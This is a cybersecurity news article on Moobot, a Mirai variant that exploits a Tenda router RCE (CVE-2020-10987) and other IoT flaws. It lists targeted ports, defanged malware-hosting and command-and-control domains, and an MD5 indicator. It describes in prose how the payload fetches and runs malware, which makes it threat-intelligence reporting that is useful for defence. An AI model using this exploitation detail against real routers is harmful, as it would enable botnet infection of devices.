Alien Lab researchers from AT&T have identified a new Mirai variant which is scanning for uncommon security vulnerabilities in internet on Tenda routers.
This variant which is dubbed “Moobot” has seen to be delivered via new malware hosting domain named “Cyberium”. Alien labs revealed that this was observed due to the peak in exploitation attempts for the Remote Code Execution vulnerability(CVE-2020-10987) on Tenda .
“This exploit can be identified by the URL that is requested, which includes ‘setUsbUnload’ with the payload assigned to the vulnerable parameter ‘deviceName’. This payload contains the logic to change the execution path to a temporary location, wget a file from a malware hosting page, provide execution permissions, and execute it.” stated in the AT&T blog.
Alien labs researchers confirmed that scan for Tenda routers lasted for a day, however the scanning activities continued for multiple weeks for the below listed vulnerabilities on different products.
- Port 80 and 8080: Axis SSI RCE.
- Port 34567: DVR scanner attempting default credentials for Sofia main video application.
- Port 37215: Huawei Home routers RCE Vulnerability (CVE-2017-17215).
- Port 52869: Realtek SDK Miniigd UPnP SOAP Command Execution (CVE-2014-8361).
“All of them appeared to be pulling their next iteration of the malware from the same malware hosting page: dns.cyberium[.]cc.” stated in the Alien labs blog.
The full list of subdomains/campaigns identified from this domain is:
- Snoopy.cyberium[.]cc: Around May 2020
- U.cyberium[.]cc: Around May 2020
- Gcc.cyberium[.]cc: Around June 2020
- Park.cyberium[.]cc: Around July 2020
- Hoon.cyberium[.]cc: Around July 2020
- Hh.cyberium[.]cc: Around September 2020
- Wo.cyberium[.]cc: Around October 2020
- Y.cyberium[.]cc: Around October 2020
- W.cyberium[.]cc: Around November 2020
- Ns.cyberium[.]cc: Around November 2020
- Tmp.cyberium[.]cc: Around December 2020
- Ftp.cyberium[.]cc: Around March 2021
- Dns.cyberium[.]cc: Around April 2021
- Ddns.cyberium[.]cc: Around April 2021
Other infrastructure which is controlled by the same actor and has been used as Moobot command and control centre.
- Park.allcheesedout[.]cc: around September 2020
- Ratatouille.allcheesedout[.]cc: around September 2020
- Watchdog.allcheesedout[.]cc: around September 2020
- Bot.bigbots[.]cc: around February 2021
- Cnc.bigbots[.]cc: around February 2021
- Cnc1.bigbots[.]cc: around February 2021
- Cnc.fewbots[.]cc: created and up since February 2021
- Bot.fewbots[.]cc: created and up since February 2021
- Cnc.hardbotz[.]cc: created and up since March 2021
- Projectaliennet[.]cc: created and up since March 2021
- Life.zerobytes[.]cc: created on May 2021
Indicators of Compromise:
|MD5||555821a5f67d064362e8ce9a48b95d56||Fbot with UPX|
-–For more Cyber security news in crisp content . Please follow our site via twitter handle @cyberworkx1